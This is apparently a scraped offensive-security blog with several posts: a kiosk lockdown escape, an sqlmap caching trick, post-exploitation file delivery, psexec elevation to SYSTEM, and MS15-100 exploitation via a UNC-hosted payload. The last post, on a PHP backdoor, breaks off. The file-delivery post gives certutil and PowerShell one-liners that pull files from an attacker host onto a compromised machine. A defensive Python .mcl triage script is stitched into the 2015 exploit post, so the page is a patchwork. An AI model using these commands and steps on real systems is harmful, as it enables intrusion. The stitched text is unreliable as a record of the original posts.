<div>Blog: Butter + Margarine != Cheese (Milk serve in different manner)</div>
<h1>Breaking the Internet Kiosk</h1>
<div>Published 2020-02-22</div>
<div dir="ltr" style="text-align: left;" trbidi="on">
<h2 style="text-align: left;">
<span style="font-family: "verdana" , sans-serif;">Objective</span></h2>
<div>
<span style="font-family: "verdana" , sans-serif;"><br /></span></div>
<div style="text-align: left;">
<span style="font-family: &quot;verdana&quot; , sans-serif;">Recently, for one of our red team objectives, our client asked whether we could actually break out of or escape from their kiosk solution environment. Kiosk lockdown is commonly used in virtual Internet banking stations, airports and various customer service centres.</span></div>
<div style="text-align: left;">
<span style="font-family: "verdana" , sans-serif;"><br /></span></div>
<h2>
<span style="font-family: "verdana" , sans-serif;">Kiosk Lockdown Solutions.</span></h2>
<div>
<span style="font-family: "verdana" , sans-serif;"><br /></span></div>
<div>
<span style="font-family: &quot;verdana&quot; , sans-serif;">A typical kiosk lockdown is usually wrapped around a container, as in the following pseudo layout.</span></div>
<blockquote class="tr_bq">
<pre>Svchost.exe --> Lockdown Solutions --> Whitelisted App (in most cases Browsers) </pre>
</blockquote>
<div style="text-align: left;">
<h2>
<span style="font-family: "verdana" , sans-serif;">Case Studies - Lockdown Protections</span></h2>
<span style="font-family: "verdana" , sans-serif;"></span><br />
<div>
<span style="font-family: &quot;verdana&quot; , sans-serif;">In our case we were only given a keyboard and a mouse to navigate. Here is a screenshot of the locked-down kiosk.</span><br />
<span style="font-family: &quot;verdana&quot; , sans-serif;"><br /></span>
<span style="font-family: &quot;verdana&quot; , sans-serif;">All drives and shortcuts are disabled, and the Start button has been disabled.</span><br />
<span style="font-family: "verdana" , sans-serif;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhvmR-B8BnIYIMzaCcV2j5WWczasT3Ne_q9ox1mME0PbfUciZnT2mkMQ2unLrA9hTxpz3YL8Y81005iszRvyI4Wv7QsHJ7rWjWd_eC301YJaQmRpXqGaiAuIVPi1NDXh5tYltisrudHwCb-/s1600/lockdown1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="664" data-original-width="828" height="256" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhvmR-B8BnIYIMzaCcV2j5WWczasT3Ne_q9ox1mME0PbfUciZnT2mkMQ2unLrA9hTxpz3YL8Y81005iszRvyI4Wv7QsHJ7rWjWd_eC301YJaQmRpXqGaiAuIVPi1NDXh5tYltisrudHwCb-/s320/lockdown1.png" width="320" /></a></div>
<span style="font-family: "verdana" , sans-serif;"><br /></span>
<span style="font-family: &quot;verdana&quot; , sans-serif;">The CTRL + ALT + DEL screen has been suppressed.</span><br />
<span style="font-family: "verdana" , sans-serif;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgSZQlrItZUrWlj5-axtbI0LTSLPFTxWFZrNryYiRM8ZJOePrERBJtS-B2p2_E-BugRskLbDhswE9AzcXddGk5mk7YwwB2ikn4ipDHsc4GRi40SLSj96aoAzTPqXJpDcAa4049JSWhBK8XC/s1600/lockdown2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="469" data-original-width="409" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgSZQlrItZUrWlj5-axtbI0LTSLPFTxWFZrNryYiRM8ZJOePrERBJtS-B2p2_E-BugRskLbDhswE9AzcXddGk5mk7YwwB2ikn4ipDHsc4GRi40SLSj96aoAzTPqXJpDcAa4049JSWhBK8XC/s320/lockdown2.png" width="279" /></a></div>
<span style="font-family: "verdana" , sans-serif;"><br /></span>
<span style="font-family: "verdana" , sans-serif;"><br /></span>
<span style="font-family: &quot;verdana&quot; , sans-serif;">Using the UNC path trick didn't work.</span><br />
<span style="font-family: "verdana" , sans-serif;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg4sLjmC7n1NZ-I7iJiwhoVhhk-H2L5Ps6G_7kdWAZ1qlS-ubLmKxEJa2-b3EFHxAs39oKsMofdsu_L3OGbTqRdtfaHa2o3uJ2k33f-DQu-GNmiFfJwGg4so1vfwIzZrrowsUO2yrQvaS9Y/s1600/lockdown3.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="236" data-original-width="688" height="109" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg4sLjmC7n1NZ-I7iJiwhoVhhk-H2L5Ps6G_7kdWAZ1qlS-ubLmKxEJa2-b3EFHxAs39oKsMofdsu_L3OGbTqRdtfaHa2o3uJ2k33f-DQu-GNmiFfJwGg4so1vfwIzZrrowsUO2yrQvaS9Y/s320/lockdown3.PNG" width="320" /></a></div>
<span style="font-family: "verdana" , sans-serif;">Using the File - Print - PDF trick also didn't work this time.</span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEig8UTBs4QPKEuWGmkdaCDfypJmW-nUG2wZUsAjpROrtuSvV9ZTmKxX91V2BOhhYPgzKV3DvDGqK7VWPG4OBKOmcVy_BF8lDJmxd8GQuD3L9rLz1ODvMAxH6Gmqxkm03gJj_SYo2QEp0djZ/s1600/lockdown4.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="177" data-original-width="620" height="91" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEig8UTBs4QPKEuWGmkdaCDfypJmW-nUG2wZUsAjpROrtuSvV9ZTmKxX91V2BOhhYPgzKV3DvDGqK7VWPG4OBKOmcVy_BF8lDJmxd8GQuD3L9rLz1ODvMAxH6Gmqxkm03gJj_SYo2QEp0djZ/s320/lockdown4.PNG" width="320" /></a></div>
<span style="font-family: "verdana" , sans-serif;"><br /></span>
<br />
<span style="font-family: "verdana" , sans-serif;"></span>
<h2>
<span style="font-family: &quot;verdana&quot; , sans-serif;">Escaping the Kiosk - poor man's style, no Cobalt Strike.</span></h2>
<div>
<span style="font-family: &quot;verdana&quot; , sans-serif;">While the environment certainly looks quite secure for 2020, there are still a few loopholes we can leverage.</span></div>
<div>
<span style="font-family: "verdana" , sans-serif;"><br /></span></div>
<div>
<span style="font-family: &quot;verdana&quot; , sans-serif;">What if we host a legitimate cmd.exe binary on the Internet, download it from the kiosk, and try to execute it?</span></div>
<div>
<span style="font-family: "verdana" , sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiaXbHgWj1KcO5bsDeVwQfRc0MPrgmj81dLREhI6HJOzaj8u4GNk7N6sfjgdQwhfIHN80Igaz6C3HUFkCYjtB_N8dG9wHStCmjFMvGlU9UzTIWvKpAvi6jno7PJ1vEEzf3YtXX99Xpw3IKN/s1600/lockdown5.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="602" data-original-width="801" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiaXbHgWj1KcO5bsDeVwQfRc0MPrgmj81dLREhI6HJOzaj8u4GNk7N6sfjgdQwhfIHN80Igaz6C3HUFkCYjtB_N8dG9wHStCmjFMvGlU9UzTIWvKpAvi6jno7PJ1vEEzf3YtXX99Xpw3IKN/s320/lockdown5.PNG" width="320" /></a></div>
<div>
<span style="font-family: "verdana" , sans-serif;"><br /></span></div>
<div>
<span style="font-family: &quot;verdana&quot; , sans-serif;">Clicking RUN works, as cmd.exe is a legitimate signed binary and is considered non-malicious by Defender by default. However, we then encounter this error, which prevents us from using cmd.exe :(</span></div>
<div>
<span style="font-family: "verdana" , sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjXUYTwgWPvkyFkhY-Dt5kWmCbxzr_G6StwcgfhuCpePpX7n2kLzCwpSRw5f6dpVrZYGS1jyrlAW9ybzgiA7KOB5HLK6ySn0fdetOoyrabjCyx3jN4NpDaHWeh8WbeYWIn_mfpDlltZeTZG/s1600/lockdown6.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="344" data-original-width="887" height="124" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjXUYTwgWPvkyFkhY-Dt5kWmCbxzr_G6StwcgfhuCpePpX7n2kLzCwpSRw5f6dpVrZYGS1jyrlAW9ybzgiA7KOB5HLK6ySn0fdetOoyrabjCyx3jN4NpDaHWeh8WbeYWIn_mfpDlltZeTZG/s320/lockdown6.PNG" width="320" /></a></div>
<div>
<span style="font-family: "verdana" , sans-serif;"><br /></span></div>
<div>
<span style="font-family: &quot;verdana&quot; , sans-serif;">Thanks to Atuk <a href="https://blog.didierstevens.com/" target="_blank">Didier Stevens</a>, we can leverage the cmd.exe built by the <a href="https://reactos.org/" target="_blank">ReactOS Project</a> (a free and open-source Windows implementation).</span><br />
<span style="font-family: "verdana" , sans-serif;"><br /></span></div>
<div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhl54FKLdPg5_QR6rzjMCrdlYwLcNaFwvUSsQeAYJ9qcOLLlhzAma5G5o2q9DP-58Ab9V9Lwm3Ndi_ZYz1afcSYYt53w5A31378AeHpG6B7ekUwmx8PrTkeGQc6SNF6GLPLvwz3gZlW6AAv/s1600/lockdown7.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="650" data-original-width="801" height="259" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhl54FKLdPg5_QR6rzjMCrdlYwLcNaFwvUSsQeAYJ9qcOLLlhzAma5G5o2q9DP-58Ab9V9Lwm3Ndi_ZYz1afcSYYt53w5A31378AeHpG6B7ekUwmx8PrTkeGQc6SNF6GLPLvwz3gZlW6AAv/s320/lockdown7.PNG" width="320" /></a></div>
<span style="font-family: "verdana" , sans-serif;"><br /></span></div>
<div>
<span style="font-family: "verdana" , sans-serif;">It works.</span><br />
<span style="font-family: "verdana" , sans-serif;"><br /></span>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiHsmxCWkpFabOf8mcwH5e2XUqLWGgYUDoGBgIuqMnSMTiAzLhN3eP1E1h97gJyO_u2mMTRvveevg_GcXY2WVQ3Roi1hZFFNUeUcQ46x8u8X0NSqWl0DDujvybyGvq8oLTp9G6S_z4cxWdK/s1600/lockdown8.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="648" data-original-width="891" height="232" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiHsmxCWkpFabOf8mcwH5e2XUqLWGgYUDoGBgIuqMnSMTiAzLhN3eP1E1h97gJyO_u2mMTRvveevg_GcXY2WVQ3Roi1hZFFNUeUcQ46x8u8X0NSqWl0DDujvybyGvq8oLTp9G6S_z4cxWdK/s320/lockdown8.PNG" width="320" /></a></div>
<span style="font-family: "verdana" , sans-serif;"><br /></span></div>
<div>
<span style="font-family: "verdana" , sans-serif;"><br /></span></div>
<div>
<span style="font-family: verdana, sans-serif;">In order to stay under the radar, we can fetch "legit" tools from Sysinternals (live.sysinternals.com) via net use.</span><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEguoSIJPSE8TnjCEzwdXtEE3KM0avDMWLSx2R2L_xmhz7kePUHYYqRta0_W4ejigNQvqpNRFrZxMDXTgEbcpL5EQMIzLlEKc0i17nA1_4HR8qkWkiY3eFk-0lkHcBT2AOH3GTxa7QScyxJ4/s1600/lockdown9.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="393" data-original-width="817" height="153" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEguoSIJPSE8TnjCEzwdXtEE3KM0avDMWLSx2R2L_xmhz7kePUHYYqRta0_W4ejigNQvqpNRFrZxMDXTgEbcpL5EQMIzLlEKc0i17nA1_4HR8qkWkiY3eFk-0lkHcBT2AOH3GTxa7QScyxJ4/s320/lockdown9.PNG" width="320" /></a></div>
<br /></div>
<div>
<span style="font-family: "verdana" , sans-serif;"><br /></span>
<span style="font-family: "verdana" , sans-serif;"><br /></span></div>
<span style="font-family: verdana, sans-serif;">Run procexp; from here we have clear visibility of how to escape :)</span><br />
<span style="font-family: verdana, sans-serif;"><br /></span>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjqR4dKJ6mnXf4ZKPY2RMFXsBAWyj0Xf5pQLwtOrQ5n69N63k8aD6azX9pnU9S7Dwjsw2U6T3cJLSgQJXesgbtTToo11k5oHM-6208JKDcqxXSXE1-jpsRvbjO3gSXFw8o7RtqIEbG6BoxR/s1600/lockdown10.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="577" data-original-width="836" height="220" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjqR4dKJ6mnXf4ZKPY2RMFXsBAWyj0Xf5pQLwtOrQ5n69N63k8aD6azX9pnU9S7Dwjsw2U6T3cJLSgQJXesgbtTToo11k5oHM-6208JKDcqxXSXE1-jpsRvbjO3gSXFw8o7RtqIEbG6BoxR/s320/lockdown10.PNG" width="320" /></a></div>
<span style="font-family: verdana, sans-serif;"><br /></span>
<span style="font-family: verdana, sans-serif;"><br /></span>
<span style="font-family: verdana, sans-serif;"><br /></span></div>
</div>
</div>
<h1>Fast re-query trick in SQLMAP</h1>
<div>Published 2017-12-09</div>
<div dir="ltr" style="text-align: left;" trbidi="on">
Sometimes you want to re-query (run the same query multiple times) in sqlmap, especially when you drop into sql-shell mode. By default, if you run the same query again, sqlmap does not execute it through the injection but serves the result from its cache/logs.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiLKc021jbrgnwxGhu47gSWKE_7ndtSTLAtCkjjzaVTlyRDdECeeBSKAfxC3oJ4JTj471MYoQLl7lat7l76xk9rZnEtXhH-1Z2c_TW-33577b9cueDUM1IeM4ploBLkORBTZ8rbO3vAwQyf/s1600/mik.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="65" data-original-width="769" height="27" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiLKc021jbrgnwxGhu47gSWKE_7ndtSTLAtCkjjzaVTlyRDdECeeBSKAfxC3oJ4JTj471MYoQLl7lat7l76xk9rZnEtXhH-1Z2c_TW-33577b9cueDUM1IeM4ploBLkORBTZ8rbO3vAwQyf/s320/mik.PNG" width="320" /></a></div>
<br />
To re-query without exiting sql-shell, one can just append an arbitrary comment to the query, such as /**/ or --ff-- (depending on your injection case), so that it no longer matches the cached entry.<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjAqdECa89mkqsrfCLNm-1TIQpPV7DEUVOfBcMMp4_OpOxHVUi-0NcrTWRGbulyX3wnjtLGU644z7W3NRr79DyZ0sA3WDnAbsx5m814cuY3sWRsZVDcKHHJTYqGy61qSbbCXyD2EZDS_3Fb/s1600/mik2.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="86" data-original-width="809" height="34" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjAqdECa89mkqsrfCLNm-1TIQpPV7DEUVOfBcMMp4_OpOxHVUi-0NcrTWRGbulyX3wnjtLGU644z7W3NRr79DyZ0sA3WDnAbsx5m814cuY3sWRsZVDcKHHJTYqGy61qSbbCXyD2EZDS_3Fb/s320/mik2.PNG" width="320" /></a></div>
<br />
<br />
<br />
<br /></div>
<h1>Windows Post-Shell command. Files Delivery</h1>
<div>Published 2017-10-05</div>
<div dir="ltr" style="text-align: left;" trbidi="on">
If you ever obtain a Windows shell remotely, these are a few tricks I currently use to pull in external files. For my notes.<br />
<br />
1. Wgetvbs<br />
<br />
https://gist.github.com/sckalath/ec7af6a1786e3de6c309<br />
<br />
2. Certutil<br />
<br />
<pre>certutil.exe -urlcache -split -f http://wateverdomainip.com/files.blah</pre>
<br />
3. Powershell<br />
<br />
<pre>PowerShell (New-Object System.Net.WebClient).DownloadFile('http://wateverdomainip.com/files.blah','files.blah')</pre>
<br />
Use https if necessary.<br />
<br />
P/S: Metasploit is awesome but many people are not happy with it. :P<br />
<br /></div>
<h1>From ADMIN to SYSTEM with love. The case of Windows 10, Server 2016 and above</h1>
<div>Published 2015-12-23</div>
<div dir="ltr" style="text-align: left;" trbidi="on">
<div>
This is for my mental notes. If it benefits you, great.</div>
2015 has been an extremely challenging year for most of us. Nevertheless, landing a shell with admin privileges is not really a big deal. The problem is that in certain environments the system has been hardened to protect the lsass.exe process, making dumping or tampering seem impossible. <div>
<br /></div>
<div>
For those of you who are not familiar, on previous versions of Windows we could simply use the <a href="http://carnal0wnage.attackresearch.com/2013/07/admin-to-system-win7-with-remoteexe.html" target="_blank">at.exe trick combined with remote.exe</a> (refer to Chris Gates' note) to obtain SYSTEM (aka NT AUTHORITY\SYSTEM). </div>
<div>
<br /></div>
<div>
Unfortunately, on Windows 10 the at command is no longer available.</div>
<div>
<br /></div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjYROKOaToWD0eaHSxgz-3m_-fsk-X6OfjaOFJLisevonEeZSeFFAB4l7VGIA4tFc32-K9JDibHm1-bpYuMUOCl3oep3q76DEtd-nrgMlyQ7iJLboddGoaQ1NJ1DuL1V9qXo_Xsj5hU5tmn/s1600/at.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjYROKOaToWD0eaHSxgz-3m_-fsk-X6OfjaOFJLisevonEeZSeFFAB4l7VGIA4tFc32-K9JDibHm1-bpYuMUOCl3oep3q76DEtd-nrgMlyQ7iJLboddGoaQ1NJ1DuL1V9qXo_Xsj5hU5tmn/s1600/at.PNG" /></a></div>
<div>
<br /><div>
<br /></div>
<div>
This proves to be an inconvenience for us. As an alternative method, we can use the Meterpreter getsystem command, which is based on 3 techniques:</div>
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh2UQWO08_aEcJE5GkYcskA-l4oQL6Ek2UmOYaldRILULg5gT0BS_gnBquRBxHCntsq_FC-jI5L9Ah7fBDfhIXLFepsjLA8C7PNxlFEAB-RCJxjjA53ZxADUEVNNRYvqu-m5rlsEbXhFXwR/s1600/at2.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="165" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh2UQWO08_aEcJE5GkYcskA-l4oQL6Ek2UmOYaldRILULg5gT0BS_gnBquRBxHCntsq_FC-jI5L9Ah7fBDfhIXLFepsjLA8C7PNxlFEAB-RCJxjjA53ZxADUEVNNRYvqu-m5rlsEbXhFXwR/s400/at2.PNG" width="400" /></a></div>
<div>
<br /></div>
<div>
You can read about my <a href="http://y0nd13.blogspot.my/2015/03/bypassing-av-in-2015.html" target="_blank">AV evasion technique</a>. But say you are in a bit of a hurry, spawning a shell via exploits is not a priority, and what you really need is just a damn good shell to, ehem, let's say install software? Simple: just use <b>psexec. </b> I wrote about it <a href="http://y0nd13.blogspot.my/2014/01/leveraging-psexec-to-execute-privileged.html" target="_blank">previously</a> to run as another user. But the current version of psexec comes with a god-mode switch: that damn <b>-s switch.</b></div>
<div>
<b><br /></b></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhIJsCt9HHiXyEiN7TsWiZvlx7kO1aAiCPLEYotBmG_-ZXOo-jK0Dyz1yx0KSwabv6ckviAELJyFfYrMe02fKdfAe0co28DkJfKsYrdc1unLb95ouh8IoiNUezY_Ii9JgFRL7TrBmAwtHUv/s1600/at3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="307" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhIJsCt9HHiXyEiN7TsWiZvlx7kO1aAiCPLEYotBmG_-ZXOo-jK0Dyz1yx0KSwabv6ckviAELJyFfYrMe02fKdfAe0co28DkJfKsYrdc1unLb95ouh8IoiNUezY_Ii9JgFRL7TrBmAwtHUv/s400/at3.png" width="400" /></a></div>
<div>
<b><br /></b></div>
<div>
<b><br /></b></div>
<div>
To become SYSTEM, right-click your cmd.exe, run it as administrator, and then run psexec -s -i -d CMD.</div>
<div>
And thus you are spawned a shell with the highest integrity.</div>
<div>
<br /></div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhgmoyy9n804nb_xBOWa8lRhb3bY1ceDJTqg6A60CvI-2M9lZ1YEG2xN1bJb-9IIPLQ2xpuWatECxmhnfGQ0kK2Sshm4SVA12XbT6sIkX_BLzIWdb61aodJ0HanGF7O1YM6FeJwAYK6lQUb/s1600/at4.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="460" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhgmoyy9n804nb_xBOWa8lRhb3bY1ceDJTqg6A60CvI-2M9lZ1YEG2xN1bJb-9IIPLQ2xpuWatECxmhnfGQ0kK2Sshm4SVA12XbT6sIkX_BLzIWdb61aodJ0HanGF7O1YM6FeJwAYK6lQUb/s640/at4.PNG" width="640" /></a></div>
<div>
<br /></div>
<div>
R.I.P AT and Shift 5 times.</div>
</div>
<h1>Exploiting CVE-2015-2509 / MS15-100: Windows Media Center could allow remote code execution</h1>
<div>Published 2015-09-11</div>
<div dir="ltr" style="text-align: left;" trbidi="on">
Trend Micro blogged about <a href="http://blog.trendmicro.com/trendlabs-security-intelligence/windows-media-center-hacking-team-bug-fixed-in-september-2015-patch-tuesday/" target="_blank">it</a> a few days ago. This vulnerability is related to the Hacking Team email leak. The issue is so trivial that exploitation is a piece of cake.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjoHnd5nVaDeopzGxC9Z1hMYoRlHjdnyE-eFXi7EN9TGAkw1zTirCKUxt4o8_bWfzRgnz7l-EBjMdGpt9J0OR-hQA16DrWkzty2ItfzKP8iAIyTtKFGrp_8SKQ-imT4Hm6WtczYFoZauQEt/s1600/shit.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="160" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjoHnd5nVaDeopzGxC9Z1hMYoRlHjdnyE-eFXi7EN9TGAkw1zTirCKUxt4o8_bWfzRgnz7l-EBjMdGpt9J0OR-hQA16DrWkzty2ItfzKP8iAIyTtKFGrp_8SKQ-imT4Hm6WtczYFoZauQEt/s640/shit.PNG" width="640" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
Source: https://technet.microsoft.com/en-us/library/security/ms15-100</div>
<br />
Based on the PoC and description, we just need to create a simple .mcl file containing our executable path and, presto, it works.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjRigy2Xkzv9c9veGZMoZ7LtY9bXj2xDI795gG6NS1fC9KJ_TSug9D7vehC-NNxWKb8nT4GCtJdZOHYUSEC_QlHV2yWlRPUN0ns-0F1PdTLTZhMaToh8N1zavNOcfbT4fQff3iTk1gLQ03i/s1600/shit2.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="290" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjRigy2Xkzv9c9veGZMoZ7LtY9bXj2xDI795gG6NS1fC9KJ_TSug9D7vehC-NNxWKb8nT4GCtJdZOHYUSEC_QlHV2yWlRPUN0ns-0F1PdTLTZhMaToh8N1zavNOcfbT4fQff3iTk1gLQ03i/s640/shit2.PNG" width="640" /></a></div>
<br />
The caveat for this attack is that you cannot pass arguments, such as cmd.exe /c ipconfig, in the .mcl file. However, we can execute our payload from an external UNC path served by a simple SMB server. The steps required:<br />
<br />
1. Generate evil payload exe<br />
2. Setup a SMB Listener<br />
3. Create MCL file that points to evil payload.<br />
4. Profits.<br />
<br />
I used the <a href="http://www.coresecurity.com/corelabs-research/open-source-tools/impacket" target="_blank">Impacket SMB server</a> to simulate the steps above. If you are a bit creative, you can use a DLL hijacking method to cloak the payload.<br />
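<div>
As an added example (not code from this post, nor from Impacket), here is a small triage routine for .mcl files of the kind described above, written from the defender's side: it parses the XML and classifies what the file would launch, treating a UNC target as the most severe case because that is the variant this post relies on. It assumes the documented MCL layout, an &lt;application&gt; element whose run attribute names the program to start; the attribute list and the sample documents are assumptions constructed for the example.</div>

```python
"""Added example: triage for Windows Media Center Link (.mcl) files.

MCL files are XML. This assumes (not taken from the post) the documented layout
in which an <application> element carries a run="..." attribute naming the
program to launch. Sample documents below are constructed for the example.
"""
import re
import xml.etree.ElementTree as ET

# Extensions that mean "this launches code", whatever the attribute says.
EXEC_SUFFIXES = (".exe", ".com", ".bat", ".cmd", ".scr", ".vbs", ".js", ".ps1")
UNC_PATH = re.compile(r"^\\\\[^\\]+\\")
# <application> attributes that can name something to launch (assumed list).
LAUNCH_ATTRIBUTES = ("run",)


def inspect_mcl(xml_text):
    """Return (severity, message) findings for one .mcl document; [] means nothing to flag."""
    try:
        root = ET.fromstring(xml_text)
    except ET.ParseError as exc:
        return [("error", f"malformed XML: {exc}")]
    findings = []
    for elem in root.iter():
        tag = elem.tag.rsplit("}", 1)[-1].lower()  # tolerate a namespace prefix
        if tag != "application":
            continue
        for attr in LAUNCH_ATTRIBUTES:
            target = (elem.get(attr) or "").strip()
            if not target:
                continue
            if UNC_PATH.match(target):
                # Remote executable over SMB/WebDAV: the pattern the post uses.
                findings.append(("high", f"{attr}= launches from a UNC path: {target}"))
            elif target.lower().endswith(EXEC_SUFFIXES):
                findings.append(("medium", f"{attr}= launches a local executable: {target}"))
            else:
                findings.append(("low", f"{attr}= launches: {target}"))
    return findings


def triage_files(documents):
    """Map each document name to its findings, skipping documents with none."""
    return {name: found for name, text in documents.items() if (found := inspect_mcl(text))}


# Constructed sample documents (no real .mcl files were used).
SAMPLE_MCL = {
    "benign_link": '<application title="Guide" url="http://mediacenter.example/guide" />',
    "local_exe": r'<application title="Calc" run="C:\Windows\System32\calc.exe" />',
    "unc_exe": r'<application title="Update" run="\\10.0.0.9\share\payload.exe" />',
    "broken": '<application run="',
}

if __name__ == "__main__":
    for name, found in triage_files(SAMPLE_MCL).items():
        for severity, message in found:
            print(f"{name}: [{severity}] {message}")
```

<div>
A mail or web gateway that already extracts attachments can run inspect_mcl over anything with an .mcl extension; the "high" finding is the one worth blocking outright, since a link file has no business starting a program from a network share.</div>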
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgPsuEoLsCpNquxhZYFziY_DG-7jZZzKAhj2hYqQ45YzLv9504Q2jiYnMouHbHzkt7yL57L-zaS_O8lUs6OyH22FaExRB7GmdUx9o4bvWNx9VCEZPX08k7aEu6Xab_2fg3RCaGr2Tsrh3XL/s1600/shit3.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="326" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgPsuEoLsCpNquxhZYFziY_DG-7jZZzKAhj2hYqQ45YzLv9504Q2jiYnMouHbHzkt7yL57L-zaS_O8lUs6OyH22FaExRB7GmdUx9o4bvWNx9VCEZPX08k7aEu6Xab_2fg3RCaGr2Tsrh3XL/s640/shit3.PNG" width="640" /></a></div>
<br />
<br />
Better patch it up fast.<br />
<br />
<br />
<br /></div>
<h1>The curious case of the crc32 gzinflate PHP backdoor</h1>
<div>Published 2015-05-02 (updated 2015-05-03)</div>
<div dir="ltr" style="text-align: left;" trbidi="on">
I was working on a side project, an IRH for a certain site. If you got compromised that badly, what you should do is ls -lt to find the list of recently tampered files.<br />
<br />
I found one glaring backdoor, unlike most PHP backdoors I have ever encountered.<br />
<br />
<br />
<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhuscvvLbeSjlXFrFsBaAPO7ktRYcmnq9I-stMb7e_CcdB4aJrsrqPRAgXHzmPp6yyshrKdUkHF7xO8mne0M3eey7cRIVH73AFjNo8qofk4st19XpeZ-dcvqcozkIgvkL0xea_QPMdi6Rdx/s1600/capture1.PNG" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhuscvvLbeSjlXFrFsBaAPO7ktRYcmnq9I-stMb7e_CcdB4aJrsrqPRAgXHzmPp6yyshrKdUkHF7xO8mne0M3eey7cRIVH73AFjNo8qofk4st19XpeZ-dcvqcozkIgvkL0xea_QPMdi6Rdx/s1600/capture1.PNG" height="185" width="640" /></a><br />
<br />
Let's rename things to give it a nicer view.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
